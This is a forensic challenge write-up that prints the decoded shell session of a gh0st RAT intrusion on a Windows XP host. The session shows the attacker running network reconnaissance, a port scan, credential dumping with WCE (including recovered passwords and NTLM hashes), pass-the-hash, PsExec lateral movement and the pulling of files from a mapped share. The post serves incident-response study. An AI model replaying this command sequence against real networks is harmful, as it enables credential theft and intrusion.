Wednesday, November 28, 2012
@jackcr forensic challenge #2 - pcap decoded
Written by:
ulilclown@gmail.com/@alwaysreit
infoseckitten@gmail.com/@infoseckitten
hack3rsaurus@gmail.com/@magicked
To decode the pcap included in the challenge, we leveraged the open-source tool chopshop from Mitre, which includes a handy module called "gh0st_decode".
Below is the decoded pcap from @jackcr's challenge. The gh0st RAT command used by the attacker was SHELL which allows (duh) shell access. This output is everything that occurred during that shell session. McAfee has a great writeup on gh0st if you want to learn more.
The data below is RED if it's data echo'd back to the attacker console, the GREEN commands are commands entered by the attacker. We were going to enter in notes about which each command does, but reading through them should be pretty self explanatory. Cheers!
TOKEN: LOGIN: eng-ustxhou-148: Windows XP Service Pack 3 - Build: 2600 - Clock: 3056 Mhz - IP: 172.16.150.20 Webcam: no
COMMAND: ACTIVED
COMMAND: SHELL
TOKEN: SHELL START
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
cd ..
cd ..
C:\WINDOWS>
mkdir webui
mkdir webui
C:\WINDOWS>
cd webui
cd webui
C:\WINDOWS\webui>
ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.150.20
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.150.2
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6681 NTFS Local Disk
D 539 0 CDFS CD Drive
COMMAND: LIST FILES (C:\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR AUTOEXEC.BAT 0 129964314217180000
DIR boot.ini 211 129981609811585442
DIR CONFIG.SYS 0 129964314217180000
DIR Documents and Settings 0 129964569290921031
DIR IO.SYS 0 129964314217180000
DIR MSDOS.SYS 0 129964314217180000
DIR NTDETECT.COM 47564 129981606020615962
DIR ntldr 250048 129981618306345996
DIR pagefile.sys 805306368 129984410083593750
DIR Program Files 0 129964566580312500
DIR RECYCLER 0 129982548503655357
DIR System Volume Information 0 129981611111718750
DIR WINDOWS 0 129984445902376741
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
..snip...
DIR vmmreg32.dll 18944 126750960000000000
DIR WBEM 0 129981628323899504
DIR Web 0 129981606114042698
DIR webui 0 129984445902376741
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: FILE SIZE (C:\WINDOWS\ps.exe: 381816)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
...snip...
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (5398)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
DIR bootstat.dat 2048 129984410109687500
...snip...
DIR WBEM 0 129981628323899504
DIR Web 0 129981606114042698
DIR webui 0 129984445902376741
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST (INVALID HANDLE)
COMMAND: FILE SIZE (C:\WINDOWS\webui\gs.exe: 303104)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
...snip...
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (333)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
COMMAND: FILE SIZE (C:\WINDOWS\webui\ra.exe: 403968)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
...snip..
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (3001)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR ra.exe 403968 129984448127283287
COMMAND: FILE SIZE (C:\WINDOWS\webui\sl.exe: 20480)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (4114)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
COMMAND: FILE SIZE (C:\WINDOWS\webui\wc.exe: 208384)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
...snip..
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (3809)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR wc.exe 208384 129984448197760606
ipconfig /all >> netuse.dll
ipconfig /all >> netuse.dll
C:\WINDOWS\webui>
net view >> netuse.dll
net view >> netuse.dll
C:\WINDOWS\webui>
net localgroup administrators >> netuse.dll
net localgroup administrators >> netuse.dll
C:\WINDOWS\webui>
net sessions >> netuse.dll
net sessions >> netuse.dll
C:\WINDOWS\webui>
net share >> netuse.dll
net share >> netuse.dll
C:\WINDOWS\webui>
net start >> netuse.dll
net start >> netuse.dll
C:\WINDOWS\webui>
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254 >> netuse.dll
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254 >> netuse.dll
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
5 IPs and 25 ports scanned in 0 hours 0 mins 13.11 secs
C:\WINDOWS\webui>
sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 >> netuse.dll
sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 >> netuse.dll
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
5 IPs and 25 ports scanned in 0 hours 0 mins 13.08 secs
C:\WINDOWS\webui>
gs -a >> netuse.dll
gs -a >> netuse.dll
0043B820
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6680 NTFS Local Disk
D 539 0 CDFS CD Drive
COMMAND: LIST FILES (C:\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR AUTOEXEC.BAT 0 129964314217180000
DIR boot.ini 211 129981609811585442
DIR CONFIG.SYS 0 129964314217180000
DIR Documents and Settings 0 129964569290921031
DIR IO.SYS 0 129964314217180000
DIR MSDOS.SYS 0 129964314217180000
DIR NTDETECT.COM 47564 129981606020615962
DIR ntldr 250048 129981618306345996
DIR pagefile.sys 805306368 129984410083593750
DIR Program Files 0 129964566580312500
DIR RECYCLER 0 129982548503655357
DIR System Volume Information 0 129981611111718750
DIR WINDOWS 0 129984447946948861
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
...snip...DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\netuse.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\netuse.dll: 11844)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
COMMAND: CONTINUE
TOKEN: FILE DATA (3661)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
ping DC-USTXHOU
ping DC-USTXHOU
Pinging dc-ustxhou.petro-market.org [172.16.150.10] with 32 bytes of data:
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.150.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\WINDOWS\webui>
ping IIS-SARIYADH-03
ping IIS-SARIYADH-03
Pinging IIS-SARIYADH-03.petro-market.org [172.16.223.47] with 32 bytes of data:
Reply from 172.16.223.47: bytes=32 time=2ms TTL=127
Reply from 172.16.223.47: bytes=32 time=1ms TTL=127
Reply from 172.16.223.47: bytes=32 time=1ms TTL=127
Reply from 172.16.223.47: bytes=32 time<1ms TTL=127
Ping statistics for 172.16.223.47:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 2ms, Average = 1ms
C:\WINDOWS\webui>
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 05:07 PM <DIR> .
11/26/2012 05:07 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 05:06 PM 208,384 wc.exe
5 File(s) 947,780 bytes
2 Dir(s) 7,005,007,872 bytes free
C:\WINDOWS\webui>
wc.exe -l
wc.exe -l
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb:PETRO-MARKET:115B24322C11908C85140F5D33B6232F:40D1D232D5F731EA966913EA458A16E7
ENG-USTXHOU-148$:PETRO-MARKET:00000000000000000000000000000000:D6717F1E5252FA87ED40AF8C46D8B1E2
C:\WINDOWS\webui>
wc.exe -w
wc.exe -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb\PETRO-MARKET:Mar1ners@4655
NETWORK SERVICE\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
ENG-USTXHOU-148$\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
C:\WINDOWS\webui>
ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.150.10... Couldn't access 172.16.150.10:
Connecting to 172.16.150.10...
C:\WINDOWS\webui>
ps \\172.16.223.47 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
ps \\172.16.223.47 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.223.47... Couldn't access 172.16.223.47:
Connecting to 172.16.223.47...
C:\WINDOWS\webui>
wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of current logon session (000003E7h) to:
Username: sysbackup
domain: current
LMHash: c2a3915df2ec79ee73108eb48073acb7
NTHash: e7a6f270f1ba562a90e2c133a95d2057
NTLM credentials successfully changed!
C:\WINDOWS\webui>
ps.exe \\172.16.150.10 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.150.10 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.150.10... Couldn't access 172.16.150.10:
Connecting to 172.16.150.10...
C:\WINDOWS\webui>
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The file exists.
Connecting to 172.16.223.47... Starting PsExec service on 172.16.223.47... Connecting with PsExec service on 172.16.223.47... Copying C:\WINDOWS\system32\ipconfig.exe to 172.16.223.47... Error copying C:\WINDOWS\system32\ipconfig.exe to remote system:
C:\WINDOWS\webui>
cd ..
cd ..
C:\WINDOWS>
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The file exists.
Connecting to 172.16.223.47... Starting PsExec service on 172.16.223.47... Connecting with PsExec service on 172.16.223.47... Copying C:\WINDOWS\system32\ipconfig.exe to 172.16.223.47... Error copying C:\WINDOWS\system32\ipconfig.exe to remote system:
C:\WINDOWS>
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rs&L10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rs&L10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
PsExec executes a program on a remote system, where remotely executed console
applications execute interactively.
Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
-a Separate processors on which the application can run with
commas where 1 is the lowest numbered CPU. For example,
to run the application on CPU 2 and CPU 4, enter:
"-a 2,4"
-c Copy the specified program to the remote system for
execution. If you omit this option the application
must be in the system path on the remote system.
-d Don't wait for process to terminate (non-interactive).
-e Does not load the specified account's profile.
-f Copy the specified program even if the file already
exists on the remote system.
-i Run the program so that it interacts with the desktop of the
specified session on the remote system. If no session is
specified the process runs in the console session.
-h If the target system is Vista or higher, has the process
run with the account's elevated token, if available.
-l Run process as limited user (strips the Administrators group
and allows only privileges assigned to the Users group).
On Windows Vista the process runs with Low Integrity.
-n Specifies timeout in seconds connecting to remote computers.
-p Specifies optional password for user name. If you omit this
you will be prompted to enter a hidden password.
-s Run the remote process in the System account.
-u Specifies optional user name for login to remote
computer.
-v Copy the specified file only if it has a higher version number
or is newer on than the one on the remote system.
-w Set the working directory of the process (relative to
remote computer).
-x Display the UI on the Winlogon secure desktop (local system
only).
-priority Specifies -low, -belownormal, -abovenormal, -high or
-realtime to run the process at a different priority. Use
-background to run at low memory and I/O priority on Vista.
computer Direct PsExec to run the application on the remote
computer or computers specified. If you omit the computer
name PsExec runs the application on the local system,
and if you specify a wildcard (\\*), PsExec runs the
command on all computers in the current domain.
@file PsExec will execute the command on each of the computers listed
in the file.
program Name of application to execute.
arguments Arguments to pass (note that file paths must be
absolute paths on the target system).
You can enclose applications that have spaces in their name with
quotation marks e.g. psexec \\marklap "c:\long name app.exe".
Input is only passed to the remote system when you press the enter
key, and typing Ctrl-C terminates the remote process.
If you omit a user name the process will run in the context of your
account on the remote system, but will not have access to network
resources (because it is impersonating). Specify a valid user name
in the Domain\User syntax if the remote process requires access
to network resources or to run in a different account. Note that
the password is transmitted in clear text to the remote system.
Error codes returned by PsExec are specific to the applications you
execute, not PsExec.
'L10n5' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS>
wce -w
wce -w
'wce' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS>
cd webui
cd webui
C:\WINDOWS\webui>
wc -w
wc -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb\PETRO-MARKET:Mar1ners@4655
NETWORK SERVICE\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
ENG-USTXHOU-148$\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
C:\WINDOWS\webui>
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The file exists.
Connecting to 172.16.223.47... Starting PsExec service on 172.16.223.47... Connecting with PsExec service on 172.16.223.47... Copying C:\WINDOWS\system32\ipconfig.exe to 172.16.223.47... Error copying C:\WINDOWS\system32\ipconfig.exe to remote system:
C:\WINDOWS\webui>
net use z: \\172.16.223.47\z
net use z: \\172.16.223.47\z
The command completed successfully.
C:\WINDOWS\webui>
copy z:\system.dll .
copy z:\system.dll .
1 file(s) copied.
C:\WINDOWS\webui>
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 06:49 PM <DIR> .
11/26/2012 06:49 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 06:44 PM 5,711 system.dll
11/26/2012 05:06 PM 208,384 wc.exe
6 File(s) 953,491 bytes
2 Dir(s) 7,004,934,144 bytes free
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6680 NTFS Local Disk
D 539 0 CDFS CD Drive
Z 15351 13079 NTFS Network Drive
COMMAND: LIST FILES (C:\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR AUTOEXEC.BAT 0 129964314217180000
DIR boot.ini 211 129981609811585442
DIR CONFIG.SYS 0 129964314217180000
DIR Documents and Settings 0 129964569290921031
DIR IO.SYS 0 129964314217180000
DIR MSDOS.SYS 0 129964314217180000
DIR NTDETECT.COM 47564 129981606020615962
DIR ntldr 250048 129981618306345996
DIR pagefile.sys 805306368 129984410083593750
DIR Program Files 0 129964566580312500
DIR RECYCLER 0 129982548503655357
DIR System Volume Information 0 129981611111718750
DIR WINDOWS 0 129984447946948861
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
...snip...
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\system.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\system.dll: 5711)
COMMAND: CONTINUE
TOKEN: FILE DATA (5711)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
copy z:\svchost.dll .
copy z:\svchost.dll .
1 file(s) copied.
C:\WINDOWS\webui>
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
DIR bootstat.dat 2048 129984410109687500
DIR clock.avi 82944 126750960000000000
DIR cmsetacl.log 373 129981622463220165
DIR Coffee Bean.bmp 17062 126750960000000000
...snip...
DIR Web 0 129981606114042698
DIR webui 0 129984509415736823
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\svchost.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\svchost.dll: 1230)
COMMAND: CONTINUE
TOKEN: FILE DATA (1230)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
copy z:\https.dll .
copy z:\https.dll .
1 file(s) copied.
C:\WINDOWS\webui>
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
...snip...
DIR webui 0 129984514405856769
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR https.dll 5282 129984516342112452
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\https.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\https.dll: 5282)
COMMAND: CONTINUE
TOKEN: FILE DATA (5282)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
z:
z:
Z:\>
dir
dir
Volume in drive Z has no label.
Volume Serial Number is 9CC4-949D
Directory of Z:\
11/26/2012 07:11 PM <DIR> .
11/26/2012 07:11 PM <DIR> ..
11/26/2012 06:20 PM 303,104 gs.exe
11/26/2012 07:00 PM 5,282 https.dll
11/26/2012 07:11 PM 109,092 netstat.dll
11/26/2012 06:20 PM 403,968 ra.exe
11/26/2012 06:56 PM 1,230 svchost.dll
11/26/2012 06:44 PM 5,711 system.dll
6 File(s) 828,387 bytes
2 Dir(s) 13,714,014,208 bytes free
Z:\>
c:
c:
C:\WINDOWS\webui>
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 07:01 PM <DIR> .
11/26/2012 07:01 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 07:00 PM 5,282 https.dll
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 06:56 PM 1,230 svchost.dll
11/26/2012 06:44 PM 5,711 system.dll
11/26/2012 05:06 PM 208,384 wc.exe
8 File(s) 960,003 bytes
2 Dir(s) 7,004,917,760 bytes free
C:\WINDOWS\webui>
copy z:\netstat.dll .
copy z:\netstat.dll .
1 file(s) copied.
C:\WINDOWS\webui>
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
...snip...
DIR Web 0 129981606114042698
DIR webui 0 129984516993374682
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
